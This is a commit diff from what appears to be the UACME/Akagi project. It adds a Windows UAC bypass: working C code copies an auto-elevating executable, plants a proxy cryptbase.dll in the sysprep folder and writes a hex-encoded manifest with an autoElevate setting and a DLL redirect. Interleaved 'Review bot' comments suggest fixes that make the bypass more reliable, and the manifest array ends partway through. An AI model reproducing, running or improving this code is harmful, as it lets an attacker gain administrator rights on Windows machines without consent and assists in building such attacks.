method 18 added
This commit is contained in:
hfiref0x 2016-05-29 15:05:10 +07:00
parent 942dbd3d21
commit 95ec4bec70
29 changed files with 403 additions and 114 deletions

17
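--- a/.gitattributes
+++ b/.gitattributes
@@ -1,17 +0,0 @@
-# Auto detect text files and perform LF normalization
-* text=auto
-# Custom for Visual Studio
-*.cs diff=csharp
-# Standard to msysgit
-*.doc diff=astextplain
-*.DOC diff=astextplain
-*.docx diff=astextplain
-*.DOCX diff=astextplain
-*.dot diff=astextplain
-*.DOT diff=astextplain
-*.pdf diff=astextplain
-*.PDF diff=astextplain
-*.rtf diff=astextplain
-*.RTF diff=astextplain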

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -4,9 +4,9 @@
*
* TITLE: APPHELP.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 14 Apr 2016
* DATE: 20 Apr 2016
*
* Application Compatibility Helper routines and definitions.
*


@ -4,9 +4,9 @@
*
* TITLE: CARBERP.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 22 Apr 2016
*
* Tweaked Carberp methods.
* Original Carberp is exploiting mcx2prov.exe in ehome.
@ -83,6 +83,7 @@ BOOL ucmWusaMethod(
case UacMethodCarberp1:
_strcat(szSourceDll, WDSCORE_DLL);
lpCommandLine = CMD_EXTRACT_MIGWIZ;
_strcat(szTargetProcess, MIGWIZ_DIR);
_strcat(szTargetProcess, MIGWIZ_EXE);
break;
@ -98,7 +99,7 @@ BOOL ucmWusaMethod(
}
if (!PathFileExists(szTargetProcess)) {
OutputDebugString(L"[UCM] Target application not found");
OutputDebugString(T_TARGETNOTFOUND);
return FALSE;
}


@ -4,9 +4,9 @@
*
* TITLE: CARBERP.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 20 Apr 2016
*
* Prototypes and definitions for Carberp method.
*


@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 28 Apr 2016
*
* Compression support.
*


@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 15 Apr 2016
* DATE: 20 Apr 2016
*
* Prototypes and definitions for compression.
*


@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 15 May 2016
*
* Global consts definition file.
*
@ -33,9 +33,13 @@
#define IFILEOP_ELEMONIKER L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"
#define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)"
#define MANIFEST_EXT L".manifest"
#define ELLOCNAK_MSU L"ellocnak.msu"
#define KERNEL32_DLL L"kernel32.dll"
#define OLE32_DLL L"ole32.dll"
#define SHELL32_DLL L"shell32.dll"
#define APPHELP_DLL L"apphelp.dll"
#define HIBIKI_DLL L"Hibiki.dll"
#define ELLOCNAK_MSU L"ellocnak.msu"
#define HIBIKI_DLL L"Hibiki.dll"
#define SLC_DLL L"SLC.dll"
#define NETUTILS_DLL L"netutils.dll"
#define ACTIONQUEUE_DLL L"ActionQueue.dll"
@ -55,16 +59,17 @@
#define INETMGR_EXE L"InetMgr.exe"
#define MMC_EXE L"mmc.exe"
#define EXPLORER_EXE L"explorer.exe"
#define TASKHOST_EXE L"taskhost.exe"
#define TZSYNC_EXE L"tzsync.exe"
#define SYSPREP_EXE L"sysprep\\sysprep.exe" //always in this dir (appinfo hardcoded)
#define SETUPSQM_EXE L"oobe\\setupsqm.exe" //always in this dir
#define MIGWIZ_EXE L"migwiz.exe"
#define SPINSTALL_EXE L"spinstall.exe"
#define EVENTVWR_MSC L"eventvwr.msc"
#define SYSPREP_DIR L"sysprep\\"
#define INETSRV_DIR L"inetsrv\\"
#define WBEM_DIR L"wbem\\"
#define SYSPREP_EXE L"sysprep\\sysprep.exe" //always in this dir (appinfo hardcoded)
#define SETUPSQM_EXE L"oobe\\setupsqm.exe" //always in this dir
#define MIGWIZ_EXE L"migwiz\\migwiz.exe" //always in this dir
#define KERNEL32_DLL L"kernel32.dll"
#define OLE32_DLL L"ole32.dll"
#define SHELL32_DLL L"shell32.dll"
#define MIGWIZ_DIR L"migwiz\\"
#define RUNAS_VERB L"runas"
#define APPCMDLINE L"hawawawa"
@ -78,6 +83,7 @@
#define UACFIX L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
#define T_AKAGI_KEY L"Software\\Akagi"
#define T_AKAGI_PARAM L"LoveLetter"
#define T_TARGETNOTFOUND L"Target application not found"
//
// Global const
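Review bot: `MIGWIZ_EXE` changes meaning in this hunk, from `migwiz\\migwiz.exe` with the directory embedded (as `SYSPREP_EXE` and `SETUPSQM_EXE` still are) to the bare `migwiz.exe`, with the directory split out into the new `MIGWIZ_DIR`. Any user of `MIGWIZ_EXE` that is not updated alongside (carberp.c is, in this commit) would now silently resolve to `system32\migwiz.exe` rather than the migwiz subdirectory, so the convention deserves a comment on the define, e.g. `#define MIGWIZ_EXE L"migwiz.exe" //bare name: callers prepend MIGWIZ_DIR or place their own copy`. The rendered page prints old and new define lines together, so the final ordering of this block is not recoverable from here.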


@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 01 May 2016
*
* Common header file for the program support routines.
*
@ -56,7 +56,6 @@
#define KONGOU_ID IDR_KONGOU32
#endif
typedef enum _UACBYPASSMETHOD {
UacMethodSysprep1 = 1,
UacMethodSysprep2,
@ -75,6 +74,7 @@ typedef enum _UACBYPASSMETHOD {
UacMethodGeneric,
UacMethodGWX,
UacMethodSysprep4,
UacMethodManifest,
UacMethodMax
} UACBYPASSMETHOD;


@ -5,9 +5,9 @@
*
* TITLE: GOOTKIT.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 20 May 2016
*
* Gootkit based AutoElevation using AppCompat.
*
@ -379,8 +379,8 @@ BOOL ucmShimPatch(
if (epRVA == 0) {
break;
}
tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024);
tmp = HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, 32 * 1024);
if (tmp != NULL) {
patchbits = (PPATCHBITS)tmp;
sz = 0;
@ -392,7 +392,7 @@ BOOL ucmShimPatch(
patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize;
sz += patchbits->ActionSize;
SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz);
HeapFree(GetProcessHeap(), 0, tmp);
HeapFree(g_ctx.Peb->ProcessHeap, 0, tmp);
}
SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH
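Review bot: The fixed 32 KB buffer from the `HeapAlloc` line is consumed by `sz += patchbits->ActionSize` with no check that `sz` stays below `32 * 1024` before the next entry is written, and the loop body that advances `patchbits` falls between the two hunks, so I cannot confirm a bound is enforced there. If the entries come from hard-coded patch data this is safe by construction, but a guard such as `if (sz + sizeof(PATCHBITS) + patchbits->PatternSize > 32 * 1024) break;` ahead of the write would make that explicit. The swap of `GetProcessHeap()` for `g_ctx.Peb->ProcessHeap` is itself behavior-neutral once `ucmInit` has set `g_ctx.Peb`. ucmShimPatch starts and ends outside these hunks.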


@ -1,14 +1,13 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2016,
* (C) Original idea (?) mzH,
* (C) FixIT Shim Patches by Jon Erickson
*
* TITLE: GOOTKIT.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 20 Apr 2016
*
* Prototypes and definitions for Gootkit method.
*


@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Hybrid UAC bypass methods.
*
@ -18,6 +18,7 @@
*******************************************************************************/
#include "global.h"
#include "makecab.h"
#include "manifest.h"
ELOAD_PARAMETERS_SIREFEF g_ElevParamsSirefef;
@ -166,7 +167,7 @@ BOOL ucmWinSATMethod(
// Copy winsat to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
OutputDebugString(L"[UCM] Target application not found");
OutputDebugString(T_TARGETNOTFOUND);
break;
}
@ -231,8 +232,6 @@ BOOL ucmWinSATMethod(
if (bResult) {
NtYieldExecution();//put your signature here
//run winsat
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx.szSystemDirectory);
@ -638,3 +637,193 @@ BOOL ucmGWX(
}
return bResult;
}
/*
* ucmAutoElevateManifestDropDll
*
* Purpose:
*
* Drop target dll for ucmAutoElevateManifest.
*
*/
BOOL ucmAutoElevateManifestDropDll(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, CRYPTBASE_DLL);
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
return FALSE;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, g_ctx.szSystemDirectory);
_strcat(szDest, SYSPREP_DIR);
return ucmMasqueradedCopyFileCOM(szSource, szDest);
}
/*
* ucmAutoElevateManifestW7
*
* Purpose:
*
* Special case for Windows 7.
*
*/
BOOL ucmAutoElevateManifestW7(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
DWORD d;
BOOL bResult = FALSE, bCond = FALSE;
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
LPWSTR lpApplication = NULL;
do {
RtlSecureZeroMemory(szSource, sizeof(szSource));
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szSource, g_ctx.szSystemDirectory);
_strcpy(szDest, g_ctx.szTempDirectory);
lpApplication = TASKHOST_EXE;//doesn't really matter, Yuubari module lists multiple targets
_strcat(szSource, lpApplication);
_strcat(szDest, lpApplication);
// Copy target to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
d = GetLastError();
OutputDebugString(T_TARGETNOTFOUND);
break;
}
_strcpy(szSource, szDest);
// Copy target app to windir
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, USER_SHARED_DATA->NtSystemRoot);
_strcat(szDest, TEXT("\\"));
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
bResult = ucmAutoElevateManifestDropDll(ProxyDll, ProxyDllSize);
if (!bResult) {
break;
}
//put target manifest
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, lpApplication);
_strcat(szSource, MANIFEST_EXT);
if (!supWriteBufferToFile(szSource, (PVOID)ManifestData, sizeof(ManifestData))) {
break;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, USER_SHARED_DATA->NtSystemRoot);
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
_strcat(szDest, L"\\");
_strcat(szDest, lpApplication);
bResult = supRunProcess(szDest, NULL);
} while (bCond);
return bResult;
}
/*
* ucmAutoElevateManifest
*
* Purpose:
*
* Bypass UAC by abusing appinfo whitelist and SXS undocumented feature.
* Ironically revealed by Microsoft itself in their attempt to fix UAC exploit.
* Supported at Windows 7 minimum (older versions not checked).
*
*/
BOOL ucmAutoElevateManifest(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL bResult = FALSE, bCond = FALSE;
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
LPWSTR lpApplication = NULL;
if ((ProxyDll == NULL) || (ProxyDllSize == 0))
return bResult;
do {
if (g_ctx.dwBuildNumber < 9600) {
bResult = ucmAutoElevateManifestW7(ProxyDll, ProxyDllSize);
break;
}
RtlSecureZeroMemory(szSource, sizeof(szSource));
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szSource, g_ctx.szSystemDirectory);
_strcpy(szDest, g_ctx.szTempDirectory);
_strcat(szSource, TZSYNC_EXE); //doesn't really matter, Yuubari module lists multiple targets
lpApplication = MIGWIZ_EXE;
_strcat(szDest, lpApplication);
// Copy target to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
OutputDebugString(T_TARGETNOTFOUND);
break;
}
_strcpy(szSource, szDest);
// Copy target app to home
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, g_ctx.szSystemDirectory);
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
bResult = ucmAutoElevateManifestDropDll(ProxyDll, ProxyDllSize);
if (!bResult) {
break;
}
//put target manifest
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, lpApplication);
_strcat(szSource, MANIFEST_EXT);
if (!supWriteBufferToFile(szSource, (PVOID)ManifestData, sizeof(ManifestData))) {
break;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, g_ctx.szSystemDirectory);
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
_strcpy(szDest, g_ctx.szSystemDirectory);
_strcat(szDest, lpApplication);
bResult = supRunProcess(szDest, NULL);
} while (bCond);
return bResult;
}
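Review bot: In `ucmAutoElevateManifestW7` the `d = GetLastError();` after the failed `CopyFile` is stored and never read, so `DWORD d` can be dropped (it will also warn at the project's Level4). The two Windows 7 destinations are built differently: the executable copy passes `NtSystemRoot` plus an explicit `\\` to `ucmMasqueradedCopyFileCOM`, while the manifest copy a few lines later passes `NtSystemRoot` with no trailing separator; if the helper tolerates both this is only inconsistent, otherwise the manifest lands in the wrong place, so I would align the second call with the first. The `g_ctx.dwBuildNumber < 9600` test also routes Windows 8 (build 9200) through this function, so its header comment `Special case for Windows 7.` should read `Special case for builds before 8.1 (< 9600), i.e. Windows 7 and 8.`. Nothing in this file removes the staged files left in `g_ctx.szTempDirectory` (`cryptbase.dll`, the copied executable and its `.manifest`) after the run, unless a caller elsewhere does so.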


@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 15 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for hybrid methods.
*
@ -63,3 +63,8 @@ BOOL ucmGenericAutoelevation(
BOOL ucmGWX(
VOID
);
BOOL ucmAutoElevateManifest(
PVOID ProxyDll,
DWORD ProxyDllSize
);


@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Program entry point.
*
@ -98,7 +98,7 @@ UINT ucmInit(
//fill common data block
RtlSecureZeroMemory(&g_ctx, sizeof(g_ctx));
g_ctx.Peb = RtlGetCurrentPeb();
g_ctx.Peb = NtCurrentPeb();
inst = g_ctx.Peb->ImageBaseAddress;
dwType = 0;
@ -614,6 +614,18 @@ UINT ucmMain()
}
break;
case UacMethodManifest:
#ifndef _DEBUG
if (g_ctx.IsWow64) {
ucmShowMessage(LAZYWOW64UNSUPPORTED);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (ucmAutoElevateManifest(g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
return ERROR_SUCCESS;
}
break;
}
return ERROR_ACCESS_DENIED;
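Review bot: The `#ifndef _DEBUG` around the WOW64 guard in the new `UacMethodManifest` case means a debug x86 build on 64-bit Windows skips the `LAZYWOW64UNSUPPORTED` message and runs `ucmAutoElevateManifest` with a 32-bit payload anyway. If that is intended for development, a comment on the `#ifndef` line such as `//debug builds skip the WOW64 check on purpose` would keep it from being read as a missing check; if not, the conditional should go. `ucmMain` starts outside the hunk, so whether the other cases follow the same pattern is not visible here.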


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015
* (C) COPYRIGHT AUTHORS, 2015 - 2016
*
* TITLE: MAKECAB.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 15 Apr 2016
* DATE: 25 May 2016
*
* Simplified Cabinet file support for makecab utility replacement.
*
@ -28,8 +28,8 @@
LPVOID DIAMONDAPI fnFCIALLOC(
ULONG cb
)
{
return HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cb);
{
return HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, cb);
}
VOID DIAMONDAPI fnFCIFREE(
@ -37,7 +37,7 @@ VOID DIAMONDAPI fnFCIFREE(
)
{
if (lpMem) {
HeapFree(GetProcessHeap(), 0, lpMem);
HeapFree(g_ctx.Peb->ProcessHeap, 0, lpMem);
}
}
@ -327,7 +327,7 @@ CABDATA *cabCreate(
return NULL;
}
pCabinet = (PCABDATA)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CABDATA));
pCabinet = (PCABDATA)HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, sizeof(CABDATA));
if (pCabinet == NULL) {
return NULL;
}
@ -352,7 +352,7 @@ CABDATA *cabCreate(
NULL);
if (pCabinet->hfci == NULL) {
HeapFree(GetProcessHeap(), 0, pCabinet);
HeapFree(g_ctx.Peb->ProcessHeap, 0, pCabinet);
pCabinet = NULL;
}
return pCabinet;
@ -425,5 +425,5 @@ VOID cabClose(
);
FCIDestroy(Cabinet->hfci);
HeapFree(GetProcessHeap(), 0, Cabinet);
HeapFree(g_ctx.Peb->ProcessHeap, 0, Cabinet);
}
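Review bot: `fnFCIALLOC` and `fnFCIFREE` are the allocator callbacks handed to FCI, and after this hunk every cabinet allocation dereferences `g_ctx.Peb`, which is only populated in `ucmInit` (`g_ctx.Peb = NtCurrentPeb();` in main.c); `GetProcessHeap()` carried no such ordering requirement. Behavior is identical once initialization has run, but a comment on `fnFCIALLOC` such as `// relies on g_ctx.Peb->ProcessHeap: cabCreate must not run before ucmInit` would record the new dependency.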


@ -4,9 +4,9 @@
*
* TITLE: MAKECAB.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for makecab module.
*

85
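--- a/Source/Akagi/manifest.h
+++ b/Source/Akagi/manifest.h
@@ -0,0 +1,85 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: MANIFEST.H
+*
+* VERSION: 2.20
+*
+* DATE: 25 May 2016
+*
+* Manifest for dll redirection, originally called "defence-in-depth approach".
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+static const unsigned char ManifestData[1007] = {
+0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x27, 0x31,
+0x2E, 0x30, 0x27, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x27, 0x75, 0x74,
+0x66, 0x2D, 0x38, 0x27, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x6C, 0x6F, 0x6E, 0x65, 0x3D,
+0x27, 0x79, 0x65, 0x73, 0x27, 0x3F, 0x3E, 0x0D, 0x0A, 0x3C, 0x61, 0x73, 0x73, 0x65, 0x6D, 0x62,
+0x6C, 0x79, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3D, 0x22, 0x75,
+0x72, 0x6E, 0x3A, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2D, 0x6D, 0x69, 0x63, 0x72, 0x6F,
+0x73, 0x6F, 0x66, 0x74, 0x2D, 0x63, 0x6F, 0x6D, 0x3A, 0x61, 0x73, 0x6D, 0x2E, 0x76, 0x31, 0x22,
+0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3A, 0x61, 0x73, 0x6D, 0x76,
+0x33, 0x3D, 0x22, 0x75, 0x72, 0x6E, 0x3A, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2D, 0x6D,
+0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2D, 0x63, 0x6F, 0x6D, 0x3A, 0x61, 0x73, 0x6D,
+0x2E, 0x76, 0x33, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x61, 0x6E, 0x69, 0x66, 0x65,
+0x73, 0x74, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31, 0x2E, 0x30, 0x22, 0x0D,
+0x0A, 0x20, 0x20, 0x20, 0x20, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x74, 0x72, 0x75, 0x73,
+0x74, 0x49, 0x6E, 0x66, 0x6F, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3D, 0x22, 0x75, 0x72, 0x6E,
+0x3A, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2D, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F,
+0x66, 0x74, 0x2D, 0x63, 0x6F, 0x6D, 0x3A, 0x61, 0x73, 0x6D, 0x2E, 0x76, 0x33, 0x22, 0x3E, 0x0D,
+0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x73, 0x65, 0x63, 0x75, 0x72, 0x69, 0x74, 0x79, 0x3E, 0x0D,
+0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65,
+0x64, 0x50, 0x72, 0x69, 0x76, 0x69, 0x6C, 0x65, 0x67, 0x65, 0x73, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
+0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64,
+0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x65, 0x76, 0x65, 0x6C, 0x0D, 0x0A,
+0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6C, 0x65, 0x76, 0x65,
+0x6C, 0x3D, 0x22, 0x72, 0x65, 0x71, 0x75, 0x69, 0x72, 0x65, 0x41, 0x64, 0x6D, 0x69, 0x6E, 0x69,
+0x73, 0x74, 0x72, 0x61, 0x74, 0x6F, 0x72, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
+0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x41, 0x63, 0x63, 0x65, 0x73, 0x73, 0x3D, 0x22,
+0x66, 0x61, 0x6C, 0x73, 0x65, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
+0x20, 0x20, 0x20, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F,
+0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64, 0x50, 0x72, 0x69, 0x76, 0x69, 0x6C, 0x65,
+0x67, 0x65, 0x73, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x73, 0x65, 0x63, 0x75,
+0x72, 0x69, 0x74, 0x79, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x74, 0x72, 0x75, 0x73, 0x74,
+0x49, 0x6E, 0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A,
+0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
+0x20, 0x20, 0x3C, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73,
+0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3D, 0x22,
+0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2E, 0x6D,
+0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x53, 0x4D, 0x49,
+0x2F, 0x32, 0x30, 0x30, 0x35, 0x2F, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x53, 0x65, 0x74,
+0x74, 0x69, 0x6E, 0x67, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C,
+0x61, 0x75, 0x74, 0x6F, 0x45, 0x6C, 0x65, 0x76, 0x61, 0x74, 0x65, 0x3E, 0x74, 0x72, 0x75, 0x65,
+0x3C, 0x2F, 0x61, 0x75, 0x74, 0x6F, 0x45, 0x6C, 0x65, 0x76, 0x61, 0x74, 0x65, 0x3E, 0x0D, 0x0A,
+0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A, 0x77, 0x69, 0x6E, 0x64,
+0x6F, 0x77, 0x73, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
+0x3C, 0x2F, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74,
+0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x21, 0x2D, 0x2D, 0x0D, 0x0A, 0x20, 0x20, 0x20,
+0x20, 0x20, 0x20, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x22, 0x64, 0x65, 0x66, 0x65, 0x6E, 0x63, 0x65,
+0x2D, 0x69, 0x6E, 0x2D, 0x64, 0x65, 0x70, 0x74, 0x68, 0x20, 0x61, 0x70, 0x70, 0x72, 0x6F, 0x61,
+0x63, 0x68, 0x22, 0x20, 0x69, 0x73, 0x20, 0x61, 0x63, 0x74, 0x75, 0x61, 0x6C, 0x6C, 0x79, 0x20,
+0x79, 0x65, 0x74, 0x20, 0x61, 0x6E, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x0D, 0x0A, 0x20, 0x20, 0x20,
+0x20, 0x20, 0x20, 0x75, 0x6E, 0x64, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x65, 0x64, 0x20,
+0x62, 0x61, 0x63, 0x6B, 0x64, 0x6F, 0x6F, 0x72, 0x2E, 0x20, 0x49, 0x20, 0x73, 0x69, 0x6E, 0x63,
+0x65, 0x72, 0x65, 0x6C, 0x79, 0x20, 0x68, 0x6F, 0x70, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x77,
+0x69, 0x6C, 0x6C, 0x20, 0x6E, 0x65, 0x76, 0x65, 0x72, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
+0x20, 0x64, 0x6F, 0x20, 0x61, 0x6E, 0x79, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x72,
+0x65, 0x20, 0x63, 0x6F, 0x6D, 0x70, 0x6C, 0x65, 0x78, 0x20, 0x74, 0x68, 0x61, 0x6E, 0x20, 0x63,
+0x6F, 0x64, 0x69, 0x6E, 0x67, 0x20, 0x54, 0x65, 0x74, 0x72, 0x69, 0x73, 0x2E, 0x0D, 0x0A, 0x20,
+0x20, 0x2D, 0x2D, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x0D, 0x0A, 0x20,
+0x20, 0x20, 0x20, 0x20, 0x20, 0x6C, 0x6F, 0x61, 0x64, 0x46, 0x72, 0x6F, 0x6D, 0x3D, 0x22, 0x25,
+0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x72, 0x6F, 0x6F, 0x74, 0x25, 0x5C, 0x73, 0x79, 0x73, 0x74,
+0x65, 0x6D, 0x33, 0x32, 0x5C, 0x73, 0x79, 0x73, 0x70, 0x72, 0x65, 0x70, 0x5C, 0x63, 0x72, 0x79,
+0x70, 0x74, 0x62, 0x61, 0x73, 0x65, 0x2E, 0x44, 0x4C, 0x4C, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20,
+0x20, 0x20, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x63, 0x72, 0x79, 0x70, 0x74, 0x62, 0x61,
+0x73, 0x65, 0x2E, 0x44, 0x4C, 0x4C, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F,
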